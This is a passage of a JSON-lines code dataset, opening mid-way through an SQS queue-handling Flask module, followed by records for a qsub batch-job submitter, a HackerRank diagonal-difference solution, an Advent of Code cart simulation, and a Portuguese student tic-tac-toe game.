config['UNIDATA_SERVER_ID'].replace(\"-\",\"_\")\n + \"-resp\"\n + \"-\" + platform.node().replace(\"-\",\"_\")\n + \"-\" + date.today().strftime(\"%Y%m%d\")\n + \"-\" + str(os.getpid())\n # + \"-\" + str(threading.get_ident())\n + \"-\" + str(self.n_resp_queue)\n + \"-\" + str(uuid4())\n )[0:80]\n resp_qname = resp_qname.replace(\".\",\"_\")\n self.queue_resp_name = resp_qname\n self.queue_resp = self.__get_queue(resp_qname)\n self.last_qtime = time.time()\n\n def __get_queue(self, queue_name):\n try:\n queue = self.sqs_client.sqs.create_queue(\n QueueName = queue_name,\n Attributes = {\n 'MessageRetentionPeriod': '300',\n 'SqsManagedSseEnabled': 'true'\n }\n )\n self.log(\"created new queue \"+queue_name)\n except:\n queue = self.sqs_client.sqs.get_queue_url(QueueName = queue_name)\n self.log(\"got existing queue \"+queue_name)\n return queue['QueueUrl']\n\n def reset(self):\n # I hoped connection pool did this but no\n self.cleanup()\n\n def cleanup(self):\n self.log(\"cleanup\")\n if ('cyg-resp1' in self.queue_resp):\n return\n try:\n self.sqs_client.sqs.delete_queue(QueueUrl=self.queue_resp)\n self.log(\"deleted queue \"+self.queue_resp)\n except:\n self.log(\"failed to delete queue \"+self.queue_resp)\n pass\n\n def log(self, message):\n try:\n current_app.logger.info(message)\n except:\n pass\n","repo_name":"sl2000/cygnum-python-sqs-middleware","sub_path":"flaskr/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35009124973","text":"\"\"\"Submit config analysis jobs to NCG batch system.\"\"\"\n\nfrom __future__ import division, print_function\nimport os\nimport os.path\nimport optparse\nimport glob\n\nSOFTDIR = \"/lstore/cms/giles/LatticeQCD_IST2018/\"\n\n\ndef make_job_file(uid, input_file, output_dir):\n \"\"\"Build and submit analysis job.\"\"\"\n output_file = output_dir + str(uid) + '.csv'\n\n cmd = \"./bin/main.exe \"\n cmd += \"-i \" + input_file\n cmd += \" -o \" + output_file\n\n job_name = \"analysis_\" + str(uid) + \".job\"\n job_file = open(job_name, \"w\")\n job_file.write(\"echo Beginning\\ job\\n\")\n job_file.write(\"module load gcc-5.4\\n\")\n job_file.write(\"export PATH=/lstore/cms/giles/programs/bin:$PATH\\n\")\n job_file.write(\"export LD_LIBRARY_PATH=/lstore/cms/giles/programs/lib64\\n\")\n job_file.write(\"cd \" + SOFTDIR + \"\\n\")\n job_file.write(\"echo Paths\\ set\\n\")\n job_file.write(cmd + \"\\n\")\n job_file.close()\n\n sub = \"qsub \" + job_name\n print(\"Submitting: \" + sub)\n os.system(sub)\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser(usage=__doc__)\n parser.add_option(\"-i\", \"--input_dir\", dest=\"input_dir\",\n default=\"/lstore/cms/giles/configs/confs_b6.2_bin/\",\n action=\"store\", help=\"Directory of configs\")\n parser.add_option(\"-n\", \"--N\", dest=\"n\", action=\"store\", default=-1,\n help=\"Number of files to run\")\n parser.add_option(\"-o\", \"--output_dir\", dest=\"output_dir\", action=\"store\",\n default='Output/', help=\"Output directory\")\n opts, args = parser.parse_args()\n\n samples = glob.glob(opts.input_dir + '*.bin')\n print('Running over {} of {} samples found'.format(opts.n, len(samples)))\n if opts.n > 0:\n samples = samples[0:int(opts.n)]\n\n for i, sample in enumerate(samples):\n make_job_file(i, sample, opts.output_dir)\n # break\n","repo_name":"GilesStrong/LatticeQCD_IST2018","sub_path":"Batch/jobRunner_ncg.py","file_name":"jobRunner_ncg.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"24183728379","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# The function is expected to return an INTEGER.\r\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\r\n#\r\n\r\ndef diagonalDifference(arr):\r\n primal = list()\r\n second = list()\r\n sumpri = 0\r\n sumsec = 0\r\n\r\n for i in range(0, len(arr)):\r\n x = arr[i][i]\r\n primal.append(x)\r\n for i in range(0, len(arr)):\r\n y = arr[i][-(i + 1)]\r\n second.append(y)\r\n\r\n for i in primal:\r\n sumpri += i\r\n for i in second:\r\n sumsec += i\r\n\r\n absolute = abs(sumpri - (sumsec))\r\n\r\n return absolute\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input().strip())\r\n\r\n arr = []\r\n\r\n for _ in range(n):\r\n arr.append(list(map(int, input().rstrip().split())))\r\n\r\n result = diagonalDifference(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"halfcress/Hackkerrank_Problem_Solving_Algorithms","sub_path":"005_Diagonal_Difference.py","file_name":"005_Diagonal_Difference.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24716214020","text":"data = []\r\n\r\nwith open(\"C:\\\\Users\\\\matth\\\\Documents\\\\Documents\\\\Advent of Code\\\\input13.txt\", \"r\") as input:\r\n for line in input:\r\n data.append(line[:-1])\r\n\r\ngraph = []\r\nfor i in range(len(data)):\r\n graph.append([])\r\n for char in data[i]:\r\n graph[i].append(char)\r\n\r\n## NOTE: this assumes that the lower-right character of the graph is blank. This line\r\n## must be adjusted if the graph has a turn there.\r\ngraph[-1].append(\" \")\r\n\r\n# This array symbolizes an array of carts.\r\n# Each cart is represented by its current location, direction, and its next turn decision.\r\n# The last element is used in each tick, to make sure that the cart hasn't yet moved.\r\ncarts = []\r\nfor i in range(len(graph)):\r\n for j in range(len(graph[0])):\r\n if graph[i][j] == \">\":\r\n carts.append([[i, j], \"right\", \"left\"])\r\n elif graph[i][j] == \"<\":\r\n carts.append([[i, j], \"left\", \"left\"])\r\n elif graph[i][j] == \"v\":\r\n carts.append([[i, j], \"down\", \"left\"])\r\n elif graph[i][j] == \"^\":\r\n carts.append([[i, j], \"up\", \"left\"])\r\n\r\nfor i in range(len(graph)):\r\n for j in range(len(graph[0])):\r\n if graph[i][j] == \">\" or graph[i][j] == \"<\":\r\n graph[i][j] = \"-\"\r\n elif graph[i][j] == \"v\" or graph[i][j] == \"^\":\r\n graph[i][j] = \"|\"\r\n\r\n# define iterate on graph and carts\r\ndef iterate(graph, carts):\r\n\r\n # we want to first sort by x coordinate (cart[0][1]) then by y (cart[0][0])\r\n for i in range(len(carts)-1):\r\n cart = carts[i]\r\n nextCart = carts[i+1]\r\n if nextCart[0][1] < cart[0][1]:\r\n temp = cart\r\n carts[i] = nextCart\r\n carts[i+1] = temp\r\n elif nextCart[0][1] == cart[0][1] and nextCart[0][0] < cart[0][0]:\r\n temp = cart\r\n carts[i] = nextCart\r\n carts[i+1] = temp\r\n \r\n output = carts.copy()\r\n\r\n for c in carts:\r\n x = c[0][0]\r\n y = c[0][1]\r\n direction = c[1]\r\n tile = graph[x][y]\r\n if tile == \"|\":\r\n if direction == \"up\":\r\n c[0][0] -= 1\r\n elif direction == \"down\":\r\n c[0][0] += 1\r\n elif tile == \"-\":\r\n if direction == \"right\":\r\n c[0][1] += 1\r\n elif direction == \"left\":\r\n c[0][1] -= 1\r\n elif tile == \"/\":\r\n if direction == \"up\":\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"down\":\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"left\":\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif direction == \"right\":\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif tile == \"\\\\\":\r\n if direction == \"up\":\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"down\":\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"left\":\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif direction == \"right\":\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif tile == \"+\":\r\n switch = c[2]\r\n if direction == \"up\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][0] -= 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif direction == \"down\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"right\"\r\n c[0][1] += 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][0] += 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"left\"\r\n c[0][1] -= 1\r\n elif direction == \"left\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][1] -= 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif direction == \"right\":\r\n if switch == \"left\":\r\n c[2] = \"straight\"\r\n c[1] = \"up\"\r\n c[0][0] -= 1\r\n elif switch == \"straight\":\r\n c[2] = \"right\"\r\n c[0][1] += 1\r\n elif switch == \"right\":\r\n c[2] = \"left\"\r\n c[1] = \"down\"\r\n c[0][0] += 1\r\n # Collision detection\r\n for c in range(len(carts)):\r\n for d in range(len(carts)):\r\n if carts[c][0] == carts[d][0] and carts[c] != carts[d]:\r\n # print(\"collision! at\", str(carts[c][0][1]) + \",\" + str(carts[c][0][0]))\r\n if carts[c] in output:\r\n output.remove(carts[c])\r\n if carts[d] in output:\r\n output.remove(carts[d])\r\n return output \r\n\r\ndef represent(graph, carts):\r\n output = [a.copy() for a in graph]\r\n for c in carts:\r\n if c[1] == \"up\":\r\n output[c[0][0]][c[0][1]] = \"^\"\r\n elif c[1] == \"down\":\r\n output[c[0][0]][c[0][1]] = \"v\"\r\n elif c[1] == \"left\":\r\n output[c[0][0]][c[0][1]] = \"<\"\r\n elif c[1] == \"right\":\r\n output[c[0][0]][c[0][1]] = \">\"\r\n for a in output:\r\n print(\"\".join(a))\r\nrepresent(graph,carts)\r\ncount = 0\r\nwhile len(carts) > 1:\r\n carts = iterate(graph, carts)\r\n count += 1\r\n print(count)\r\n # represent(graph, carts)\r\n\r\nprint(\"Final cart at\", carts[0][0][1], carts[0][0][0])\r\n","repo_name":"MatthewGregoire42/AdventOfCode2018","sub_path":"13.2.py","file_name":"13.2.py","file_ext":"py","file_size_in_byte":6165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74141108691","text":"import random\nfrom os import system, name \n\ndef getMatricula():\n \"\"\"\n Retorna a matricula do aluno como string\n \"\"\"\n return \"2020204959\" \n\ndef getNome():\n \"\"\"\n Retorna o nome completo do aluno\n \"\"\"\n return \"Guilherme Cosme Petri Dalmaso\" \n\ndef limpaTela(): \n\tif name == 'nt': \n\t\tsystem('cls') \n\telse: \n\t\tsystem('clear') \n\ndef simboloJogador():\n \"\"\"\n Função para o jogador escolher X ou O para jogar,\n também define o símbolo do PC de acordo com o que o jogador escolher.\n \"\"\"\n escolha = input(\"Escolha X ou O para começar a partida: \")\n if escolha == \"x\" or escolha == \"X\":\n simboloPlayer = \"X\"\n simboloPC = \"O\"\n return simboloPlayer, simboloPC\n elif escolha == \"o\" or escolha == \"O\":\n simboloPlayer = \"O\"\n simboloPC = \"X\"\n return simboloPlayer, simboloPC\n else:\n print(\"Símbolo não reconhecido! Você pode escolher X ou O\")\n return simboloJogador()\n\ndef jogaPrimeiro(Lista = [\"PC\",\"JOGADOR\"]):\n \"\"\"\n Função que escolhe \"aleatóriamente\" quem começa jogando\n \"\"\"\n comeca = (random.choice(Lista))\n if comeca == \"PC\":\n print(\"O PC joga primeiro\")\n return comeca\n elif comeca == \"JOGADOR\":\n print(\"Você começa jogando\")\n return comeca\n\ndef printTabuleiro(tabuleiro):\n \"\"\"\n Função que imprime o tabuleiro\n \"\"\"\n print(f\" {tabuleiro[7]} | {tabuleiro[8]} | {tabuleiro[9]}\")\n print(\"---+---+---\")\n print(f\" {tabuleiro[4]} | {tabuleiro[5]} | {tabuleiro[6]}\")\n print(\"---+---+---\")\n print(f\" {tabuleiro[1]} | {tabuleiro[2]} | {tabuleiro[3]}\")\n\ndef jogadaPlayer(tabuleiro, simboloPlayer):\n \"\"\"\n Solicita o jogador para escolher uma posição no tabuleiro\n \"\"\"\n escolhaJogador = int(input(\"Escolha uma posição de 1 a 9 no tabuleiro: \"))\n if escolhaJogador < 1 or escolhaJogador > 9:\n print(\"Posição Inválida! Escolha novamente\")\n return jogadaPlayer(tabuleiro, simboloPlayer)\n else:\n if tabuleiro[escolhaJogador] != \" \":\n print(\"A posição já foi escolhida! Por favor escolha outra opção\")\n return jogadaPlayer(tabuleiro, simboloPlayer)\n else:\n tabuleiro[escolhaJogador] = simboloPlayer\n printTabuleiro(tabuleiro)\n\n\n\ndef jogadaComputador(tabuleiro, simboloComputador):\n \"\"\"\n Recebe o tabuleiro e o simbolo (X ou O) do computador e determina onde o computador deve jogar\n O tabuleiro pode estar vazio (caso o computador seja o primeiro a jogar) ou com algumas posições preenchidas, \n sendo a posição 0 do tabuleiro descartada.\n\n Parâmetros:\n tabuleiro: lista de tamanho 10 representando o tabuleiro\n simboloComputador: letra do computador\n simboloPlayer: letra do jogador\n i: se for 1, significa que o computador é o primeiro a jogar, caso o contrário, é o segundo\n\n Retorno:\n Posição (entre 1 e 9) da jogada do computador\n\n Estratégia:\n Se o Computador for o primeiro a jogar, ele vai escolher alguma das posições das quinas\n Caso o contrário, ele vai verificar se é necessário fazer a defesa\n A partir da 5 rodada, ele vai verificar se já é possível ganhar a partida\n Se não for necessário a defesa, o PC irá atacar\n \"\"\"\n\n if simboloComputador == \"X\":\n simboloPlayer = \"O\"\n else:\n simboloPlayer = \"X\"\n\n if tabuleiro == [\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"]:\n escolhaPC = random.choice([1,3,7,9])\n if escolhaPC == 1:\n return 1\n elif escolhaPC == 3:\n return 3\n elif escolhaPC == 7:\n return 7\n elif escolhaPC == 9:\n return 9\n else:\n #ataque linha 1\n if tabuleiro[1] == simboloComputador and tabuleiro[2] == simboloComputador and tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[1] == simboloComputador and tabuleiro[3] == simboloComputador and tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[2] == simboloComputador and tabuleiro[3] == simboloComputador and tabuleiro[1] == \" \":\n return 1 \n #ataque linha 2 \n elif tabuleiro[4] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[4] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[4] == \" \":\n return 4 \n #ataque linha 3\n elif tabuleiro[7] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[7] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[8] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n #ataque coluna 1\n elif tabuleiro[1] == simboloComputador and tabuleiro[4] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[1] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[4] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[1] == \" \":\n return 1\n #ataque coluna 2\n elif tabuleiro[2] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[2] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[8] == simboloComputador and tabuleiro[2] == \" \":\n return 2 \n #ataque coluna 3\n elif tabuleiro[3] == simboloComputador and tabuleiro[6] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[3] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[6] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[3] == \" \":\n return 3 \n #ataque diagonal 1\n elif tabuleiro[1] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[1] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[9] == simboloComputador and tabuleiro[1] == \" \":\n return 1 \n #ataque diagonal 2\n elif tabuleiro[3] == simboloComputador and tabuleiro[5] == simboloComputador and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[3] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloComputador and tabuleiro[7] == simboloComputador and tabuleiro[3] == \" \":\n return 3 \n\n #defesa linha 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[2] == simboloPlayer and tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[1] == simboloPlayer and tabuleiro[3] == simboloPlayer and tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[2] == simboloPlayer and tabuleiro[3] == simboloPlayer and tabuleiro[1] == \" \":\n return 1 \n #defesa linha 2\n elif tabuleiro[4] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[4] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[4] == \" \":\n return 4\n #defesa linha 3\n elif tabuleiro[7] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[7] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[8] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n #defesa coluna 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[4] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[1] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[4] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[1] == \" \":\n return 1\n #defesa coluna 2\n elif tabuleiro[2] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[8] == \" \":\n return 8\n elif tabuleiro[2] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[8] == simboloPlayer and tabuleiro[2] == \" \":\n return 2\n #defesa coluna 3\n elif tabuleiro[3] == simboloPlayer and tabuleiro[6] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[3] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[6] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[3] == \" \":\n return 3 \n #defesa diagonal 1\n elif tabuleiro[1] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n elif tabuleiro[1] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[9] == simboloPlayer and tabuleiro[1] == \" \":\n return 1 \n #defesa diagonal 2\n elif tabuleiro[3] == simboloPlayer and tabuleiro[5] == simboloPlayer and tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[3] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[5] == \" \":\n return 5\n elif tabuleiro[5] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[3] == \" \":\n return 3 \n #defesa de ataque pelas quinas \n elif (tabuleiro[1] == simboloPlayer and tabuleiro[9] == simboloPlayer) or (tabuleiro[3] == simboloPlayer and tabuleiro[7] == simboloPlayer):\n if tabuleiro[2] == \" \":\n return 2\n elif tabuleiro[4] == \" \":\n return 4 \n elif tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[8] == \" \":\n return 8 \n elif tabuleiro[6] == simboloPlayer and tabuleiro[7] == simboloPlayer and tabuleiro[9] == \" \":\n return 9\n #defesa por posições de numero par\n elif tabuleiro[2] == simboloPlayer or tabuleiro[4] == simboloPlayer or tabuleiro[6] == simboloPlayer or tabuleiro[8] == simboloPlayer:\n if tabuleiro[5] == \" \":\n return 5 \n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n #defesa por posições de numero ímpar\n elif tabuleiro[1] == simboloPlayer or tabuleiro[3] == simboloPlayer or tabuleiro[7] == simboloPlayer or tabuleiro[9] == simboloPlayer:\n if tabuleiro[5] == \" \":\n return 5 \n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n #ataque\n elif tabuleiro[1] == \" \":\n return 1\n elif tabuleiro[3] == \" \":\n return 3\n elif tabuleiro[7] == \" \":\n return 7\n elif tabuleiro[9] == \" \":\n return 9 \n elif tabuleiro[2] == \" \":\n return 2 \n elif tabuleiro[4] == \" \":\n return 4\n elif tabuleiro[6] == \" \":\n return 6\n elif tabuleiro[8] == \" \":\n return 8\n\ndef jogadaPC(tabuleiro, simboloComputador, i):\n \"\"\"\n Atribui a jogada feita pelo computador na função 'jogadaComputador' ao tabuleiro\n \"\"\"\n if i == 1:\n escolhaPC = jogadaComputador(tabuleiro, simboloComputador)\n if escolhaPC == 1:\n tabuleiro[1] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 3:\n tabuleiro[3] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 7:\n tabuleiro[7] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 9:\n tabuleiro[9] = simboloComputador\n printTabuleiro(tabuleiro)\n else:\n escolhaPC = jogadaComputador(tabuleiro, simboloComputador)\n if escolhaPC == 1:\n tabuleiro[1] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 2:\n tabuleiro[2] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 3:\n tabuleiro[3] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 4:\n tabuleiro[4] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 5:\n tabuleiro[5] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 6:\n tabuleiro[6] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 7:\n tabuleiro[7] = simboloComputador\n printTabuleiro(tabuleiro)\n elif escolhaPC == 8:\n tabuleiro[8] = simboloComputador\n printTabuleiro(tabuleiro) \n elif escolhaPC == 9:\n tabuleiro[9] = simboloComputador\n printTabuleiro(tabuleiro) \n\ndef verificaJogada(tabuleiro):\n \"\"\"\n Verifica se o 'X' ou 'O' ganhou o Jogo, se até a ultima rodada nenhum dos 2 ganhar, é considerado empate\n \"\"\"\n #Se X vencer\n #linhas\n if tabuleiro[7] == 'X' and tabuleiro[8] == 'X' and tabuleiro[9] == 'X':\n return True\n elif tabuleiro[4] == 'X' and tabuleiro[5] == 'X' and tabuleiro[6] == 'X':\n return True\n elif tabuleiro[1] == 'X' and tabuleiro[2] == 'X' and tabuleiro[3] == 'X':\n return True\n #colunas\n elif tabuleiro[1] == 'X' and tabuleiro[4] == 'X' and tabuleiro[7] == 'X':\n return True\n elif tabuleiro[2] == 'X' and tabuleiro[5] == 'X' and tabuleiro[8] == 'X':\n return True\n elif tabuleiro[3] == 'X' and tabuleiro[6] == 'X' and tabuleiro[9] == 'X':\n return True\n #diagonal\n elif tabuleiro[1] == 'X' and tabuleiro[5] == 'X' and tabuleiro[9] == 'X':\n return True\n elif tabuleiro[3] == 'X' and tabuleiro[5] == 'X' and tabuleiro[7] == 'X':\n return True \n\n #Se O vencer\n #linhas\n if tabuleiro[7] == 'O' and tabuleiro[8] == 'O' and tabuleiro[9] == 'O':\n return True\n elif tabuleiro[4] == 'O' and tabuleiro[5] == 'O' and tabuleiro[6] == 'O':\n return True\n elif tabuleiro[1] == 'O' and tabuleiro[2] == 'O' and tabuleiro[3] == 'O':\n return True\n #colunas\n elif tabuleiro[1] == 'O' and tabuleiro[4] == 'O' and tabuleiro[7] == 'O':\n return True\n elif tabuleiro[2] == 'O' and tabuleiro[5] == 'O' and tabuleiro[8] == 'O':\n return True\n elif tabuleiro[3] == 'O' and tabuleiro[6] == 'O' and tabuleiro[9] == 'O':\n return True\n #diagonal\n elif tabuleiro[1] == 'O' and tabuleiro[5] == 'O' and tabuleiro[9] == 'O':\n return True\n elif tabuleiro[3] == 'O' and tabuleiro[5] == 'O' and tabuleiro[7] == 'O':\n return True \n\ndef main():\n \"\"\"\n Chama as funções principais e dedtermina a ordem das jogadas\n \"\"\"\n limpaTela()\n print(getMatricula())\n print(getNome())\n print(\"SEJA BEM VINDO AO DESAFIO DO JOGO DA VELHA!\")\n simboloPlayer, simboloComputador = simboloJogador()\n primeiraJogada = jogaPrimeiro()\n tabuleiro = [\" \"]*10\n printTabuleiro(tabuleiro)\n if primeiraJogada == \"PC\":\n #1\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 1)\n #2\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #3\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #4 \n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #5\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro)\n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit()\n #6\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #7\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2)\n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #8\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #9\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n else:\n print(\"Empate!!!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit()\n elif primeiraJogada == \"JOGADOR\":\n #1\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #2\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #3\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n #4\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n #5\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer)\n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #6\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2)\n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #7\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #8\n print(\"VEZ DO PC\")\n jogadaPC(tabuleiro, simboloComputador, 2) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"O Computador venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n #9\n print(\"SUA VEZ\")\n jogadaPlayer(tabuleiro, simboloPlayer) \n verificaJogada(tabuleiro) \n if verificaJogada(tabuleiro) == True:\n print(\"Você venceu a partida!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n else:\n print(\"Empate!!!\")\n _ = input(\"Pressione enter para finalizar...\")\n exit() \n\n## NÃO ALTERE O CÓDIGO ABAIXO ##\nif __name__ == \"__main__\":\n main()","repo_name":"guicosme1/Trabalhos-Python","sub_path":"cc1/jogodavelha.py","file_name":"jogodavelha.py","file_ext":"py","file_size_in_byte":20618,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 